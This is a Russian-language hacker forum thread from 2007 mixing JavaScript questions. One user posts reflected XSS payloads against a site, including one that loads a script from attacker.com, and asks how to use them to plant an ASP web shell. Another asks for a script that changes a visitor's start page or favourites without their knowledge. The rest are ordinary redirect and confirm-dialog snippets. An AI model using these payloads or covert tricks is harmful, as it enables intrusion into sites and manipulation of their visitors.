 |
|
16.06.2007, 12:43
|
|
Познающий
Регистрация: 15.06.2007
Сообщений: 91
С нами:
9951302
Репутация:
38
|
|
Привет народ!
Собссно такое дело.....есть сайт на котором иксэсэс такова рода:
_http://site.com/search.asp?query="><script>alert()</script>
хз какова типа (пассивный или активный), можна ли залить на него асп-эшный шелл таким путём? если да, то расскажите по подробней плз, а то в иксэсэсах я не очень шарю. Я уже пробовал таким путём прописать его:
_http://site.com/search.asp?query="><script src=http://attacker.com/script.js></script>
Где скрипт.жс указывает прописать шелл на (в) страницу с функцией document.write() , но в итоге я получаю контент этого шелла на странице.
Подскажте плз...
//ЗЫ: Со снифером дело отпадает....
Последний раз редактировалось Tw!m4; 16.06.2007 в 12:50..
|
|
|
16.06.2007, 14:51
|
|
Познающий
Регистрация: 15.06.2007
Сообщений: 91
С нами:
9951302
Репутация:
38
|
|
Хех......)) чета я об этом даже и не подумал (о выполнение кода в браузере а не на серваке).....хм.....аякс я к сожелению не знаю.....эта значит я в пролёте? да уж....фигня какая то ((......а че можна в таком случае еще сделать?
|
|
|
|
17.06.2007, 09:00
|
|
Новичок
Регистрация: 03.11.2006
Сообщений: 28
С нами:
10272741
Репутация:
3
|
|
Всем привет, подскажите плиз скрипт редиректа без задержки. Есть такой :
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://">
Но он всёрабно перед загрузкой нужной страницы заходит на главную....
Спасибо!
|
|
|
|
17.06.2007, 09:14
|
|
Познающий
Регистрация: 21.05.2007
Сообщений: 61
С нами:
9986942
Репутация:
145
|
|
Только при помощи php или htaccess.
PHP код:
<?php
header ( "Location: http://site.com" );
?>
|
|
|
|
17.06.2007, 16:30
|
|
Новичок
Регистрация: 03.11.2006
Сообщений: 28
С нами:
10272741
Репутация:
3
|
|
Понял, спасибо! впринципе уже добился чего хотел, а ещё такой вопрос. Подскажите скрипт который добавляет нужную страницу на стартовую страницу, и\или в избранное без ведома юзера!!!!
|
|
|
|
19.06.2007, 18:27
|
|
Участник форума
Регистрация: 07.01.2007
Сообщений: 259
С нами:
10179446
Репутация:
41
|
|
Макс 8===3, кстати, редирект можно и с помощью JS замутить, и будет, вроде как без задержки.
PHP код:
<script language="JavaScript">
document.location.href = "http://someshit/";
</script>
Правда в случае отключенного JS, ясен, не покатит, так-что PHP вариант рулит  но раз уж тут тема про JS решил запостить. |
|
|
|
21.06.2007, 23:26
|
|
Участник форума
Регистрация: 05.04.2007
Сообщений: 123
С нами:
10052518
Репутация:
27
|
|
Каким образом можно сделать подтверждение нажатия на ссылку? Дайте пример
|
|
|
|
21.06.2007, 23:34
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами:
11058146
Репутация:
4536
|
|
Код:
<script type='text/javascript'>
function check(url){
if(confirm("да?")){
document.location=url;
}else{
alert('нет так нет');
}
}
</script>
<a href='javascript://' onClick="check('next.page)">123</a>
|
|
|
|
22.06.2007, 00:05
|
|
Участник форума
Регистрация: 05.04.2007
Сообщений: 123
С нами:
10052518
Репутация:
27
|
|
Сообщение от GreenBear
Код:
<script type='text/javascript'>
function check(url){
if(confirm("да?")){
document.location=url;
}else{
alert('нет так нет');
}
}
</script>
<a href='javascript://' onClick="check('next.page)">123</a>
че-то непашет)) наверно из-за неправильного кода в a href
|
|
|
|
22.06.2007, 00:09
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами:
11058146
Репутация:
4536
|
|
ну ковычку сами догадаетесь поставить.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
